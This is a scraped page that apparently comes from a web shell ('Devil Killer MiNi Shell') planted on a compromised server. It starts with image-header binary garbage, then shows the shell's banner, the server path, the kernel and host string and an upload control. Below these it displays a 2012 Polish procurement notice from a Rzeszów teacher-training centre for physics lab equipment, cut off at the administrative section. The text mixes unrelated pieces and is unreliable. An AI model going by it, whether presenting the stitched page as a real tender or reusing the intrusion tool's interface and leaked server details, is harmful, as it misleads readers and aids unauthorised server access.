JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120131/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120131/25777-N-2012.html

<p class="kh_header"><b>Rzeszów: Zakup pomocy dydaktycznych do pracowni fizycznej w ramach projektu Edukacja skuteczna, przyjazna, nowoczesna - rozwój kompetencji kadry zarządzającej i pedagogicznej szkół i placówek oświatowych w województwie podkarpackim współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego oraz  projektu systemowego Podkarpackie szkolenie informatyczno-metodyczne w ramach POKL09.04.00-18-133/08</b><br>
<b>Numer ogłoszenia: 25777 - 2012; data zamieszczenia: 31.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Podkarpackie Centrum Edukacji Nauczycieli w Rzeszowie , ul. Niedzielskiego 2, 35-036 Rzeszów, woj. podkarpackie, tel. 17 8534097, faks 17 8534682.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcen.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup pomocy dydaktycznych do pracowni fizycznej w ramach projektu Edukacja skuteczna, przyjazna, nowoczesna - rozwój kompetencji kadry zarządzającej i pedagogicznej szkół i placówek oświatowych w województwie podkarpackim współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego oraz  projektu systemowego Podkarpackie szkolenie informatyczno-metodyczne w ramach POKL09.04.00-18-133/08.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup następujących pomocy dydaktycznych do pracowni fizycznej:
1)Zestaw do ćwiczeń uczniowskich z elektrostatyki - 2 zestawy Rura rezonansowa umożliwiająca wiele wariantów badań  akustycznych fal stojących: z zamkniętymi obydwoma końcami i wypełniona różnymi gazami, z otwartymi obydwoma końcami lub otwartym jednym końcem. Możliwa  zmiana długości rury za pomocą tłoka. Rura powinna być wykonana  z przeźroczystego pleksiglasu zakończona zatyczkami posiadającymi końcówki do wprowadzenia gazów. Jedna z zatyczek wyposażona powinna być wyposażona w głośnik. Długość minimum: 100 cm, średnica: 7 cm. W skład kompletu wchodzą: rura rezonansowa, podstawa trójnóg 2 szt.,  próbnik mikrofonowy. Komplet pozwalający  na realizację szeregu doświadczeń z zakresu elektrostatyki obejmujących m.in.: elektryzowanie przewodników i izolatorów, siłę elektrostatyczną, prawo Coulomba, elektryzowanie ciał przez dotyk i przez indukcję, pole elektrostatyczne, linie pola, kondensator, polaryzację dielektryków. W skład wyrobu wchodzą: elektroskop, elektrofor, pręt szklany, pręt metalowy, pręt ebonitowy, wahadło elektryczne, statyw izolacyjny, podstawa obrotowa do lasek (prętów), butelka lejdejska, rozbrajacz, folia aluminiowa, neonówka.  
Całość dostarczana w pudełku z wydzielonymi przegrodami o wymiarach nie mniejszych: 310x370x100 mm
2)Komplet do nauki o prądzie elektrycznym - 2 komplety Części kompletu powinny umożliwiać tworzenie układów, za pomocą których możemy wywołać i wielokrotnie powtarzać zjawiska fizyczne z dziedziny magnetyzmu i elektryczności. Instrukcja powinna obejmować  opis co najmniej  50 ćwiczeń z następujących tematów: magnesy i pole magnetyczne, opór elektryczny, indukcja elektromagnetyczna, elektroliza. Komplet powinien być w opakowaniu o wymiarach nie mniejszych niż: 480x300x80 450x300x100.
3)Komplet do doświadczeń z ciepła - wersja rozbudowana - 2 komplety
Komplet umożliwiający przeprowadzenie szeregu doświadczeń z zakresu nauki o cieple, obejmujących takie zagadnienia jak: rozszerzalność cieplna ciał stałych, cieczy i gazów, miana stanu skupienia ciała, pomiary temperatury, rozchodzenie się ciepła, kalorymetria, przemiana energii, konwersji energii cieplnej światła na energię elektryczną i mechaniczna, właściwości i zastosowań bimetali.
W składa kompletu powinny wchodzić minimum następujące pomoce dydaktyczne: dylatoskop, kalorymetr, przyrząd do liniowego przewodzenia ciepła, przewodniki ciepła, termoskop, odwadniacz, pierścień Gravesanda, przyrząd do konwekcji ciepła, aktynometr,  bateria słoneczna, radiometr Croocke a, czujnik bimetaliczny, szkło i sprzęt laboratoryjny. Wymiary co najmniej: 730x390x130mm.
4)Zestaw demonstracyjny do doświadczeń mechaniki do tablicy szkolnej - 1 zestaw
Zestaw do doświadczeń uczniowskich z mechaniki powinien zawierać pomoce dydaktyczne, składające  się z elementów, które montuje się ze sobą i w ten sposób powstaną  układy doświadczalne. Zestaw powinien umożliwiać wykonanie minimum 25 opisanych w instrukcji ćwiczeń. Ćwiczenia powinny być z różnymi rodzajami ruchów z równoczesnym zapisem tych ruchów przez chronograf. W skład zestawu wchodzą: podstawa- 1 szt., uchwyt do podstawy - 2 szt., sprężyna - 2 szt., uchwyt z haczykiem - 4 szt., pręt - 6 szt., łącznik krzyżowy - 4 szt., przymiar - 2 szt., belka z otworami i uchwytem blokującym - 1 szt., wskazówka - 1szt., pręt krótki o zmiennej średnicy - 2 szt., klocek - 1 szt., obciążniki do klocka - 2 szt., figury płaskie - 2 szt., bryła drewniana z drutem - 1 szt., obciążniki na pręcie - 1 szt., obciążniki z podstawą - 1 szt., wózek - 1 szt., rynienka - 1 szt., blok z haczykiem - 2 szt., naczynie do prawa Archimedesa - 1 szt., klocek do naczynia - 3 szt., naczynie z odpływem - 1 szt., klocek - 3 szt., bryła niekształtna - 1 szt., kulka z haczykiem - 3 szt., siłomierz - 3 szt., pion - 1 szt., haczyk - 6 szt., szalka - 2 szt., chronograf - 1 szt., kółko do rynienki - 1 szt., szpulka - 1 szt.
Do zestawu powinna być  dołączona  instrukcja zawierająca   propozycje ćwiczeń  z rysunkami poglądowymi wyjaśniającymi sposób zestawienia układów doświadczalnych. Waga co najmniej 6 kg. Pomoce powinny zostać umieszczone w walizce o wymiarach nie mniejszych: 500x400x100mm
5)Komplet do doświadczeń z magnetyzmu - 2 komplety Komplet ma mieć zastosowanie  jako pomoc dydaktyczna w nauczaniu fizyki w szkole podstawowej, gimnazjum oraz w szkołach ponadgimnazjalnych. Komplet powinien umożliwić przeprowadzenie m.in. następujących doświadczeń: własności magnesów; właściwości biegunów; magnetyzm trwały i nie trwały; linie sił pól magnetycznych; pole magnetyczne; metale w polu magnetycznym. Komplet powinien składać się minimum z następujących części: dwa magnesy sztabkowe, dwa magnesy podkowiaste, dwie długie igły magnetyczne, dwie podstawki z kolcami do długich igieł magnetycznych, dziesięć małych igieł magnetycznych, dziesięć podstawek z kolcami do małych igieł magnetycznych, jeden pierścień żelazny, jedno pudełko do przechowywania opiłek, jedno pudełko z dziurkowaną pokrywą do rozsiewania opiłek, jedna płytka mosiężna, jedna igła z osią poziomą w widełkowej oprawie.
6)Komplet do elektromagnetyzmu - 2 komplety, Komplet powinien umożliwić wykonywanie następujących doświadczeń z zakresu pola magnetycznego i elektromagnetycznego: obserwacja pola magnetycznego magnesów trwałych; wzajemne oddziaływanie magnesów; metale w polu magnetycznym; obserwacja pola magnetycznego wokół przewodników, w których płynie prąd stały; wyznaczanie kierunku i zwrotu siły elektrodynamicznej działającej na przewodnik z prądem w polu magnetycznym; wyznaczanie kierunku i zwrotu sił elektrodynamicznych działających na dwa przewodniki z prądem; zachowanie się cewki z prądem w polu magnetycznym; wzbudzanie prądu w obwodach z cewką za pomocą pola magnetycznego. Konstrukcja elementów kompletu powinna umożliwić przeprowadzenie doświadczeń na projektoskopie.
7)Termodynamika i ciepło zestaw doświadczalny- 2 zestawy Zestaw powinien pozwalać  na  wprowadzenie podstawowych  pojęć z zakresu termodynamiki i doświadczeń związanych z ciepłem. Powinien zapewnić  podstawy do zrozumienia  ilościowej oceny zagadnień i problemów termodynamiki. W skład zestawy powinny wchodzić co najmniej następujące elementy: termometr, cyfrowy miernik oraz termopara, zlewki, kolba filtracyjna, cylinder miarowy, naczynie wirówki, smar silikonowy, rurka silikonowa, u-rurka, kalorymetr z aparatem do badania prawa Joulea i przewody łączące, termiczny płaszcz izolacyjny, zestaw gumowych korków oraz bloczków parafinowych, cylindry ze stali nierdzewnej oraz aluminium do liniowej rozszerzalności cieplnej, pręty w kształcie litery U wykonane z aluminium, mosiądzu, stali nierdzewnej o różnych średnicach, cylindry do badania ciepła właściwego, palnik z trójnogiem i siatki druciane, komparator 1/100 mm ze wspornikiem, naczynie do badania przejścia stanu gazowego w ciekły, manganian(VII) potasu, łącznik bimetaliczny ze stykami elektrycznymi, uniwersalna podstawa ogólnego zastosowania, wielofunkcyjne pręty i zaciski. Komplet ma umożliwić badanie następujących prawa i zasady: promieniowanie cieplne, wrzenie i skraplanie, kalorymetr i prawo Joulea, prawo Daltona (prawo ciśnień cząstkowych), temperatura równowagi mieszaniny cieczy, parowanie dwóch różnych cieczy, rozszerzalność lodu, stała czasowa termometru i stałe punkty termometru, równanie Fouriera i prawo Fouriera, wrażliwość na ciepło oraz prawo Lockea, rozszerzalność liniowa ciał stałych, higrometr suchy i mokry, wilgotność względna, psychrometria i wilgotność, prawo ogrzewania i chłodzenia Newtona, przemiana fazowa, zasada działania naczynia pulsującego, roztwory nasycone i przesycone, zjawiska różnych roztworów w różnej temperaturze, ciepło właściwe, pobudzenie cieplne, przewodnictwo i rozszerzalność, termostat i termopara, zjawisko Peltiera-SeebeckaLista doświadczeń opisanych w instrukcji obsługi: wrażliwość na działanie ciepła oraz równowaga cieplna, pomiar współczynnika rozszerzalności objętościowej wody, punkty stałe termometru, pomiar temperatury za pomocą termopary typu T, rozszerzalność liniowa ciał stałych, współczynnik rozszerzalności żelaza i mosiądzu, przykłady użycia termostatu, pomiary temperatury wrzenia alkoholu, wrzenie przy ciśnieniu wyższym i niższym od ciśnienia atmosferycznego, pomiar ciepła parowania wody, wykres krzepnięcia parafiny, roztwory nasycone i przesycone, higrometr mokry i suchy, rozszerzalność powietrza przy stałym ciśnieniu i objętości, konwekcja cieplna płynów, przewodność cieplna żelaza, mosiądzu, aluminium i miedzi, przewodnictwo cieplne wody, absorpcja promieniowania cieplnego, izolacja cieplna, konstrukcja prostego naczynia Dewara, inne wielkości związane z ogrzewaniem cieczy, właściwa pojemność cieplna cieczy i ciał stałych, temperatura równowagi mieszaniny cieczy, pojemność cieplna kalorymetru, przemiana energii mechanicznej w energię cieplną, zjawisko Joulea, rozszerzalność lodu, ciepło przemiany fazowej topnienia lodu, ciepło przemiany fazowej parowania wody, parowanie dwóch różnych cieczy, podwyższenie temperatury wrzenia. Waga: co najmniej  6 kg, opakowanie z trwałego materiału o rozmiarach nie mniejszych: 72x49x15 cm
8)Zestaw do ćwiczeń z optyki geometrycznej- 2 zestawy Komplet powinien składać się  z elementów optycznych i montażowych oraz ławy optycznej. Powinien umożliwiać wykonanie wielu eksperymentów z optyki takich jak: rozchodzenie światła, otrzymywanie obrazu obserwowanego przez soczewkę, obraz otrzymany na ekranie: ogniskowa i środek optyczny, zaćmienia Słońca i Księżyca, cień, półcień otrzymywanie prostej wiązki światła, załamanie światła w wodzie, rozszczepienie światła białego za pomocą pryzmatu, reflektor, aparat fotograficzny. W jego skład powinny wchodzić co najmniej następujące elementy: ława optyczna min. 115 cm, suwak uchwytu i projektor, prowadnica i uchwyt przysłon, zestaw siedmiu przysłon, rzutnik z żarówką 12V i zapasowa żarówką, transformator 12V, 2,5 A, pojedyncze i poczwórne mocowanie żarówki, pryzmat równoboczny, dwukolorowy ekran metalowy, zestaw kolorowych filtrów, lampa halogenowa +zapasowa, fotometr Jollyego, uchwyty do soczewek i luster  4x, zestawy soczewek wypukłych i wklęsłych
9)Maszyna elektrostatyczna - 2 szt. Maszyna do otrzymywania wysokiego napięcia umożliwia m.in. przeprowadzanie następujących doświadczeń: iskra i jej własności; fizjologiczne działanie iskry; działanie ciepłe iskry ; jonizacyjne działanie płomienia; rozmieszczanie ładunków na powierzchni przewodnika; działanie ostrzy; linie sił pola elektrycznego; efekty świetlne w ciemności; doświadczenie z rurką próżniową.
Wymiary minimalne ok. - 400 x 240 x 430 mm Ciężar  maks.- 5 kg
10)Generator van de Graffa - 1 szt. Przyrząd jest uproszczonym działającym modelem generatorów elektrostatycznych Van de Graffa, ma służyć w technice do wytwarzania niezwykle wysokich napięć rzędu kilku MV. Za pomocą przyrządu można wykonać szereg doświadczeń: rozmieszczanie ładunków na powierzchni przewodnika; linie sił pola elektrycznego; działanie cieplne iskry; efekty świetlne wyładowań.
W skład wyrobu powinien wchodzi konduktor stożkowy. Parametry: zasilanie - 24 V, 50 Hz, pobór mocy max - 20 W, wymiary minimalne - 500 x 300 x 245 mm, ciężar maksymalny - 7 kg
11)Inductor Ruhmkorffa - 1 szt. Pomoc dydaktyczna ma służyć do otrzymywania bardzo wysokich jednokierunkowych napięć elektrycznych. Stosuje się ją do: demonstrowania iskry elektrycznej, wyładowań w rurkach próżniowych, prądów Tesli, fal elektromagnetycznych, zasilania rur Roentgena, rezonansu elektrycznego itp. doświadczeń. Parametry: napięcie zasilania (stałe) - 6-8 V, pobór prądu - 0,15-1,5 A, wymiary minimalne - 400 x 210 x 200 mm, ciężar maksymalny  - 4 kg
12)Tor powietrzny - komplet - 1 komplet  Komplet przeznaczony do badania ruchu jednostajnego, jednostajnie przyśpieszonego, II Prawa Newtona, zderzeń sprężystych i niesprężystych, z wykorzystaniem elektronicznych czujników ruchu i licznika z możliwością podłączenia do komputera PC. W skład kompletu wchodzą: tor powietrzny z podstawowym zestawem akcesoriów, dmuchawa elektryczna, dwie foto-bramki do montażu na torze, licznik elektroniczny.
13)Zestaw optyczny do tablicy magnetycznej - 1 zestaw. Zestaw powinien zawierać zbiór elementów służących praktycznemu zapoznaniu się z bazowymi prawami z zakresu optyki geometrycznej. Zestaw powinien zawierać minimum następujące elementy: soczewki, pryzmat, bryły cieniowe, zwierciadła, dysk optyczny, filtry. Wszystkie elementy powinny być przezroczyste (wykonane z pleksiglasu) i posiadać folię magnetyczną, dzięki której mogą być mocowane na tablicy metalowej. Do zestawu powinna być dołączona instrukcja zawierająca opis 25 doświadczeń..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku w tym zakresie; do potwierdzenia oświadczenie o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku w tym zakresie; do potwierdzenia oświadczenie o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku w tym zakresie; do potwierdzenia oświadczenie o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku w tym zakresie; do potwierdzenia oświadczenie o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku w tym zakresie; do potwierdzenia oświadczenie o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony i podpisany przez osobę/osoby upoważnione Formularz ofertowy stanowiący Załącznik Nr 1 do SIWZ.
2.Pełnomocnictwo w przypadku, gdy wykonawcę reprezentuje pełnomocnik, określające jego zakres i podpisane przez osoby uprawnione do reprezentacji Wykonawcy (złożone w formie oryginału lub notarialnie potwierdzonej kopii). 
Postanowienia w przypadku złożenia oferty wspólnej przez dwóch lub więcej Wykonawców, o których mowa w art. 23 ustawy Prawo zamówień publicznych
1.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
2.Pełnomocnictwo do pełnienia takiej funkcji, wystawione zgodnie z wymogami prawa, podpisane przez prawnie upoważnionych przedstawicieli każdego z Wykonawców winno być dołączone do oferty.
3.Przedsiębiorcy prowadzący działalność w formie spółki cywilnej winni ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (art. 23 ust. 2 Ustawy Prawo Zamówień Publicznych), ewentualnie przedłożyć umowę spółki lub Uchwałę Wspólników, określające zakres uprawnień do reprezentowania spółki przez wspólników (art. 865 KC).
4.Zgodnie z art. 141 ustawy Prawo zamówień publicznych Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za wykonanie umowy.
5.Oferta winna być sporządzona wg następujących zasad:
a)formularz oferty i dokumenty o których mowa w Rozdziale IV pkt.I ppkt.  1, Rozdziale IV pkt. III ppkt. 1-2 Wykonawcy występujący wspólnie składają jako jeden łączny, podpisany przez pełnomocnika,
b)załączniki, o których  mowa w Rozdziale IV pkt. II ppkt. 1-2 winny być złożone przez każdy z podmiotów oddzielnie.
Postanowienia w przypadku złożenia oferty przez Wykonawcę polegającego na zasobach innych podmiotów, o których mowa w art. 26 ust. 2b ustawy prawo zamówień publicznych:
1.Wykonawca, który będzie polegał na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależenie od charakteru prawnego łączących go z nimi stosunków, jest zobowiązany udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
2.Kopie dokumentów dotyczących podmiotu, na którego zasoby powołuje się wykonawca powinny być poświadczone za zgodność z oryginałem przez ten podmiot.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wprowadzenia zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, których dokonano wyboru Wykonawcy w zakresie:
1)zmiany terminu wykonania zamówienia w przypadku wystąpienia siły wyższej. Siła wyższa - oznacza wydarzenie nieprzewidywalne i poza kontrolą stron niniejszej umowy występujące po podpisaniu umowy, a powodujące niemożliwość wywiązywania się z umowy w jej obecnym brzemieniu.Jeżeli Zamawiający uzna, że zaistniałe okoliczności stanowiące podstawę do zmiany w umowie nie są zasadne, Wykonawca zobowiązany jest do realizacji zadania zgodnie z zawarta umową.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
